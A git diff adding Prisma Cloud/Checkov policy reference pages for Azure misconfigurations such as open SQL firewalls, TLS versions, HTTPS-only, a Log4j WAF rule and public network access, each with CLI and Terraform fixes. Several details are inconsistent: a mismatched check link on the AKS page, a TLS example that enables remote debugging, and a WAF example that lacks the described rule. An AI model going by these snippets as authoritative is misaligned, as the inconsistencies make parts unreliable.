from 0.0.0.0/0 +// Azure SQL Servers Firewall rule allow ingress access from IP address 0.0.0.0/0 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 427c5e57-07d6-4dc6-8142-848a2472e963 + +|Checkov Check ID +|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 427c5e57-07d6-4dc6-8142-848a2472e963 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +SQL Server includes a firewall to block access from unauthorized connections. +The SQL server default Firewall exists with StartIp of 0.0.0.0 and EndIP of 0.0.0.0, allowing access to all Azure services. +A custom rule can be set with StartIp of 0.0.0.0 and EndIP of 255.255.255.255, allowing access from *any* IP over the Internet. +To reduce the potential attack surface for a SQL server, firewall rules should be defined with more granular IP addresses. +This is achieved by referencing the range of addresses available from specific datacenters. +We recommend SQL Databases do not allow ingress from 0.0.0.0/0, that is, any IP. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *SQL servers*. + +. For each SQL server: a) Click *Firewall / Virtual Networks*. ++ +b) Set *Allow access to Azure services* to *OFF*. ++ +c) Set firewall rules to limit access to authorized connections.
+ + +*CLI Command* + + +To disable the default Firewall rule *Allow access to Azure services*, use the following command: +---- +Remove-AzureRmSqlServerFirewallRule +-FirewallRuleName "AllowAllWindowsAzureIps" +-ResourceGroupName <resource group name> +-ServerName <server name> +---- +To remove a custom Firewall rule, use the following command: +---- +Remove-AzureRmSqlServerFirewallRule +-FirewallRuleName "<firewallRuleName>" +-ResourceGroupName <resource group name> +-ServerName <server name> +---- +To set the appropriate firewall rules, use the following command: +---- +Set-AzureRmSqlServerFirewallRule +-ResourceGroupName <resource group name> +-ServerName <server name> +-FirewallRuleName "<Fw rule Name>" +-StartIpAddress "<IP Address other than 0.0.0.0>" +-EndIpAddress "<IP Address other than 0.0.0.0 or 255.255.255.255>" +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_firewall_rule, azurerm_sql_firewall_rule, azurerm_postgresql_firewall_rule, azurerm_mysql_firewall_rule +* *Arguments:* start_ip_address + + +[source,go] +---- +resource "azurerm_mysql_firewall_rule" "example" { +  ...
+- start_ip_address = "0.0.0.0" +- end_ip_address   = "255.255.255.255" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc new file mode 100644 index 000000000..c0748741c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-5.adoc @@ -0,0 +1,90 @@ +== Azure App Service Web app doesn't redirect HTTP to HTTPS +// Azure App Service Web app does not enforce HTTPS-only traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cc2b77b-ad71-4a84-8cab-66b2b04eea5f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py[CKV_AZURE_14] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Azure Web Apps by default allows sites to run under both HTTP and HTTPS, and can be accessed by anyone using non-secure HTTP links. +Non-secure HTTP requests can be restricted and all HTTP requests redirected to the secure HTTPS port. +We recommend you enforce HTTPS-only traffic to increase security. +This will redirect all non-secure HTTP requests to HTTPS ports. +HTTPS uses the SSL/TLS protocol to provide a secure connection, which is both encrypted and authenticated. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *App Services*. + +. For each App, click App. ++ +a) Navigate to the *Settings* section. ++ +b) Click *SSL settings*. ++ +c) Navigate to the *Protocol Settings* section. ++ +d) Set *HTTPS Only* to *On*.
+
+
+*CLI Command*
+
+
+To enforce HTTPS-only traffic for an existing app, use the following command:
+----
+az webapp update
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+--set httpsOnly=true
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* https_only
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ https_only = true
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc
new file mode 100644
index 000000000..376fbc941
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-6.adoc
@@ -0,0 +1,90 @@
+== Azure App Service Web app doesn't use latest TLS version
+// Azure App Service Web app does not use latest TLS version
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 74e43b65-16bf-42a5-8d10-a0f245716cde
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py[CKV_AZURE_15]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The Transport Layer Security (TLS) protocol secures transmission of data over the internet using standard encryption technology.
+Encryption should be set to use the latest version of TLS.
+App Service allows TLS 1.2 by default, which is the TLS level recommended by industry standards such as PCI DSS.
+App Service currently allows a web app to set TLS versions 1.0, 1.1 and 1.2.
+For secure web app connections it is highly recommended to use only the latest TLS version, 1.2.
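The policy above boils down to a single attribute comparison on the app's configuration. As an illustration only (this is not Checkov's implementation, and the plain-dict resource layout is an assumed stand-in for parsed HCL), a minimal Python sketch of the logic:

```python
# Toy sketch of an attribute check in the spirit of CKV_AZURE_15
# (not Checkov's actual code). Resources are assumed to be pre-parsed
# into plain dicts; a real scanner parses the HCL first.

def check_min_tls_version(resource: dict) -> str:
    # azurerm_app_service defaults to TLS 1.2 when the argument is
    # omitted, so an absent value passes.
    version = resource.get("site_config", {}).get("min_tls_version", "1.2")
    return "PASSED" if version == "1.2" else "FAILED"

print(check_min_tls_version({"site_config": {"min_tls_version": "1.0"}}))  # FAILED
print(check_min_tls_version({"site_config": {"min_tls_version": "1.2"}}))  # PASSED
print(check_min_tls_version({}))  # PASSED (provider default)
```

The default-aware lookup matters: a resource that never mentions `min_tls_version` still passes, because the provider default is already the recommended level.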
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *App Services*.
+
+. For each Web App, click the App.
++
+a) Navigate to the *Settings* section.
++
+b) Click *SSL Settings*.
++
+c) Navigate to the *Protocol Settings* section.
++
+d) Set *Minimum TLS Version* to *1.2*.
+
+
+*CLI Command*
+
+
+To set the TLS version for an existing app, use the following command:
+----
+az webapp config set
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+--min-tls-version 1.2
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* min_tls_version
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ min_tls_version = "1.2"
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc
new file mode 100644
index 000000000..0d8cb0544
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-7.adoc
@@ -0,0 +1,91 @@
+== Azure App Service Web app client certificate is disabled
+// Azure App Service Web App client certificate disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b1eec428-ad10-4206-a40e-916dbb0a76bd
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AppServiceClientCertificate.py[CKV_AZURE_17]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Client certificates allow the Web App to require a certificate for incoming requests.
+Only clients that have a valid certificate will be able to reach the app.
+The TLS mutual authentication technique in enterprise environments ensures the authenticity of clients to the server.
+If incoming client certificates are enabled, only an authenticated client with a valid certificate can access the app.
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *App Services*.
+
+. For each Web App, click the App.
++
+a) Navigate to the *Settings* section.
++
+b) Click *SSL Settings*.
++
+c) Navigate to the *Protocol Settings* section.
++
+d) Set *Incoming client certificates* to *On*.
+
+
+*CLI Command*
+
+
+To set the incoming client certificates value for an existing app, use the following command:
+----
+az webapp update
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+--set clientCertEnabled=true
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* client_cert_enabled
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ client_cert_enabled = true
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc
new file mode 100644
index 000000000..34876c85d
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8.adoc
@@ -0,0 +1,99 @@
+== Azure App Service Web app doesn't use HTTP 2.0
+// Azure App Service Web App does not use HTTP 2.0
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4f5c4a28-c3df-4bee-a980-621c794548ed
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py[CKV_AZURE_18]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Periodically, new versions of HTTP are released to address security flaws and include additional functionality.
+HTTP 2.0 improves on the head-of-line blocking problem of the older HTTP version and adds header compression and prioritization of requests.
+HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own more efficient mechanisms for data streaming.
+We recommend you use the latest HTTP version for web apps to take advantage of security fixes and new functionality.
+With each software installation you can determine if a given update meets your organization's requirements.
+Organizations should verify the compatibility and support provided for any additional software, assessing the current version against the update revision being considered.
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. 
Navigate to *App Services*.
+
+. For each Web App, click the App.
++
+a) Navigate to the *Settings* section.
++
+b) Click *Application Settings*.
++
+c) Navigate to the *General Settings* section.
++
+d) Set *HTTP version* to *2.0*.
++
+NOTE: Most modern browsers support the HTTP 2.0 protocol over TLS only, with non-encrypted traffic using HTTP 1.1. To ensure that client browsers connect to your app with HTTP/2, secure your app's custom domain either with an App Service Certificate or by binding a third-party certificate.
+
+
+*CLI Command*
+
+
+To set the HTTP 2.0 version for an existing app, use the following command:
+----
+az webapp config set
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+--http20-enabled true
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* http2_enabled
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ site_config {
++   http2_enabled = true
++ }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc
new file mode 100644
index 000000000..71c3c7d01
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9.adoc
@@ -0,0 +1,87 @@
+== Azure MySQL Database Server SSL connection is disabled
+// Azure MySQL Database Server SSL connection disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| cc96a6d0-3251-4bf9-aaa4-349c34810721
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py[CKV_AZURE_28]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+SSL connectivity provides an additional layer of security by connecting a 
database server to client applications using Secure Sockets Layer (SSL).
+Enforcing SSL connections between a database server and client applications helps protect against _man-in-the-middle_ attacks.
+This is achieved by encrypting the data stream between the server and application.
+We recommend you set *Enforce SSL connection* to *Enabled* on MySQL Server databases.
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *Azure Database for MySQL server*.
+
+. For each database:
++
+a) Click *Connection security*.
++
+b) Navigate to the *SSL Settings* section.
++
+c) Set *Enforce SSL connection* to *ENABLED*.
+
+
+*CLI Command*
+
+
+To set MySQL databases to enforce SSL connections, use the following command:
+----
+az mysql server update
+--resource-group <resourceGroupName>
+--name <serverName>
+--ssl-enforcement Enabled
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mysql_server
+* *Arguments:* ssl_enforcement_enabled
+
+
+[source,go]
+----
+resource "azurerm_mysql_server" "example" {
+  ...
++ ssl_enforcement_enabled = true
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc
new file mode 100644
index 000000000..096b519cc
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access.adoc
@@ -0,0 +1,95 @@
+== Azure Storage Account 'Trusted Microsoft Services' access not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3d8d4e24-1336-4bc1-a1f3-15e680edca07
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py[CKV_AZURE_36]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Some Microsoft services that interact with storage accounts operate from networks that cannot be granted access through network rules.
+To help this type of service work as intended, you can allow the set of trusted Microsoft services to bypass the network rules.
+These services will use strong authentication to access the storage account.
+Allowing trusted Microsoft services grants access to the storage account for the following services: Azure Backup, Azure Site Recovery, Azure DevTest Labs, Azure Event Grid, Azure Event Hubs, Azure Networking, Azure Monitor and Azure SQL Data Warehouse (when registered in the subscription).
+Turning on firewall rules for a storage account will block incoming requests for data, including those from other Azure services, such as using the portal and writing logs.
+Functionality can be re-enabled. 
+The customer can get access to services like Monitor, Networking, Hubs, and Event Grid by enabling *Trusted Microsoft Services* through exceptions.
+Backup and Restore of Virtual Machines using unmanaged disks in storage accounts with network rules applied is supported by creating an exception.
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *Storage Accounts*.
+
+. For each storage account:
++
+a) Navigate to the *Settings* menu.
++
+b) Click *Firewalls and virtual networks*.
++
+c) For selected networks, select *Allow access*.
++
+d) Select *Allow trusted Microsoft services to access this storage account*.
++
+e) To apply the changes, click *Save*.
+
+
+*CLI Command*
+
+
+To update trusted Microsoft services, use the following command:
+----
+az storage account update
+--name <StorageAccountName>
+--resource-group <resourceGroupName>
+--bypass AzureServices
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_storage_account, azurerm_storage_account_network_rules
+* *Arguments:* bypass
+
+
+[source,go]
+----
+resource "azurerm_storage_account" "example" {
+  ...
++ bypass = ["AzureServices"]
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc
new file mode 100644
index 000000000..65202d2cc
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc
@@ -0,0 +1,67 @@
+== Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled
+// Azure Application Gateway Web Application Firewall (WAF) policy rule for Remote Command Execution disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0550cb51-be87-48c6-af1a-2bd1f91b8d91
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py[CKV_AZURE_135]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Using a vulnerable version of the Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string, which can potentially lead to remote code execution, data leakage and more.
+Configure your Application Gateway WAF to block this mechanism using the rule definition below. 
+Learn more at https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228].
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_web_application_firewall_policy
+
+
+[source,go]
+----
+resource "azurerm_web_application_firewall_policy" "example" {
+  location            = "germanywestcentral"
+  name                = "example"
+  resource_group_name = "example"
+
+  managed_rules {
+    managed_rule_set {
+      type    = "OWASP"
+      version = "3.1"
+    }
+  }
+
+  policy_settings {}
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc
new file mode 100644
index 000000000..0500ef970
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking.adoc
@@ -0,0 +1,58 @@
+== Azure Container registries Public access to All networks is enabled
+// Azure Container Registry public access to All networks enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d283949a-7a91-4cc6-883c-944013c38202
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py[CKV_AZURE_139]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling public network access and automated anonymous pulling improves security by ensuring your Azure container registries (ACRs) are not exposed to the public internet. 
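The buildtime fix that follows turns anonymous pulling off explicitly. As an illustration only (not Checkov's code, and the dict layout is an assumed stand-in for parsed HCL), a minimal Python sketch of the boolean check:

```python
# Toy boolean check in the spirit of the ACR policy above (not Checkov's
# actual code): an azurerm_container_registry config passes when
# anonymous pulling is off.

def check_anonymous_pull(resource: dict) -> str:
    # The provider default for anonymous_pull_enabled is assumed to be
    # false, so an omitted argument passes.
    return "FAILED" if resource.get("anonymous_pull_enabled", False) else "PASSED"

print(check_anonymous_pull({"anonymous_pull_enabled": True}))   # FAILED
print(check_anonymous_pull({"anonymous_pull_enabled": False}))  # PASSED
print(check_anonymous_pull({"sku": "Premium"}))                 # PASSED
```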
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_container_registry
+* *Arguments:* anonymous_pull_enabled
+
+
+[source,go]
+----
+resource "azurerm_container_registry" "ckv_unittest_pass_1" {
+  name                   = "containerRegistry1"
+  resource_group_name    = azurerm_resource_group.rg.name
+  location               = azurerm_resource_group.rg.location
+  sku                    = "Premium"
+  anonymous_pull_enabled = false
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc
new file mode 100644
index 000000000..ceab42a6b
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc
@@ -0,0 +1,71 @@
+== Azure AKS cluster nodes have public IP addresses
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d4827453-7559-4044-96fe-786493016357
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling node public IP addresses improves security by ensuring your Azure AKS cluster nodes can only be accessed from non-public IP addresses. 
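Since the relevant argument defaults to the safe value, the interesting part of this check is how an absent attribute is treated. As an illustration only (not Checkov's code; the node-pool dict is an assumed stand-in for parsed HCL), a minimal Python sketch:

```python
# Toy sketch of a default-aware check (not Checkov's actual code):
# an AKS node pool passes when enable_node_public_ip is absent or
# false, because the provider default is false.

def check_node_public_ip(node_pool: dict) -> str:
    return "FAILED" if node_pool.get("enable_node_public_ip", False) else "PASSED"

pool_with_public_ip = {"name": "default", "enable_node_public_ip": True}
pool_with_default = {"name": "default"}  # argument omitted

print(check_node_public_ip(pool_with_public_ip))  # FAILED
print(check_node_public_ip(pool_with_default))    # PASSED
```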
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_kubernetes_cluster
+* *Arguments:* enable_node_public_ip (default is false)
+
+
+[source,go]
+----
+resource "azurerm_kubernetes_cluster" "ckv_unittest_pass" {
+  name                = "example-aks1"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  dns_prefix          = "exampleaks1"
+
+  default_node_pool {
+    name       = "default"
+    node_count = 1
+    vm_size    = "Standard_D2_v2"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Environment = "Production"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc
new file mode 100644
index 000000000..606e0760d
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-app-service-slot-has-debugging-disabled.adoc
@@ -0,0 +1,77 @@
+== Azure App service slot does not have debugging disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 410f5fac-b595-48c4-9cd1-eefabcb99616
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py[CKV_AZURE_155]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling debugging for your Azure App Service slot can help improve the security of your app.
+Debugging allows you to troubleshoot issues with your app by providing access to detailed information about how the app is functioning.
+However, it can also make it easier for attackers to gain access to sensitive information about your app, such as its code and configuration. 
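Unlike the top-level attributes in the previous policies, this setting lives inside the slot's nested `site_config` block. As an illustration only (not Checkov's code; the dict layout is an assumed stand-in for parsed HCL), a minimal Python sketch of the nested lookup:

```python
# Toy sketch of a nested-attribute check (not Checkov's actual code):
# an azurerm_app_service_slot passes when
# site_config.remote_debugging_enabled is absent or false (the
# provider default is false).

def check_remote_debugging(slot: dict) -> str:
    enabled = slot.get("site_config", {}).get("remote_debugging_enabled", False)
    return "FAILED" if enabled else "PASSED"

print(check_remote_debugging({"site_config": {"remote_debugging_enabled": True}}))  # FAILED
print(check_remote_debugging({"site_config": {"min_tls_version": "1.2"}}))          # PASSED
print(check_remote_debugging({}))  # PASSED (no site_config block at all)
```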
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service_slot
+* *Arguments:* remote_debugging_enabled (default is false)
+
+
+[source,go]
+----
+resource "azurerm_app_service_slot" "pass2" {
+  name                = "ted"
+  app_service_name    = azurerm_app_service.example.name
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  app_service_plan_id = azurerm_app_service_plan.example.id
+
+  https_only = false # the default
+
+  site_config {
+    dotnet_framework_version = "v4.0"
+    min_tls_version          = "1.2"  # the default is 1.2
+    remote_debugging_enabled = false  # the default is false
+  }
+
+  app_settings = {
+    "SOME_KEY" = "some-value"
+  }
+
+  connection_string {
+    name  = "Database"
+    type  = "SQLServer"
+    value = "Server=some-server.mydomain.com;Integrated Security=SSPI"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc
new file mode 100644
index 000000000..dd1150080
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc
@@ -0,0 +1,80 @@
+== Azure App Service slot does not use the latest version of TLS encryption
+// Azure App Service slot does not use the latest version of TLS encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9d64bfd7-afd2-44fa-bd86-7ecd76d3d82a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py[CKV_AZURE_154]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+The Transport Layer Security (TLS) protocol 
secures transmission of data between servers and web browsers over the Internet using standard encryption technology.
+To follow security best practices and the latest PCI compliance standards, enable the latest version of the TLS protocol (i.e., TLS 1.2) for all your App Service slots.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service_slot
+* *Arguments:* min_tls_version
+
+
+[source,go]
+----
+resource "azurerm_app_service_slot" "pass2" {
+  name                = "ted"
+  app_service_name    = azurerm_app_service.example.name
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  app_service_plan_id = azurerm_app_service_plan.example.id
+
+  https_only = false # the default
+
+  site_config {
+    dotnet_framework_version = "v4.0"
+    min_tls_version          = "1.2" # the default is 1.2
+    remote_debugging_enabled = true  # the default is false
+  }
+
+  app_settings = {
+    "SOME_KEY" = "some-value"
+  }
+
+  connection_string {
+    name  = "Database"
+    type  = "SQLServer"
+    value = "Server=some-server.mydomain.com;Integrated Security=SSPI"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc
new file mode 100644
index 000000000..ab515cfe7
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc
@@ -0,0 +1,58 @@
+== Azure Cognitive Services accounts enable public network access
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 65cc30f0-f49c-4d12-a025-8390dc634b08
+
+|Checkov Check ID
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py[CKV_AZURE_134]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling the public network access property improves security by ensuring your Azure Cognitive Services can only be accessed from a private endpoint.
+This configuration strictly disables access from any public address space outside of the Azure IP range and denies all logins that match IP or virtual network-based firewall rules.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_cognitive_account
+* *Arguments:* public_network_access_enabled
+
+
+[source,go]
+----
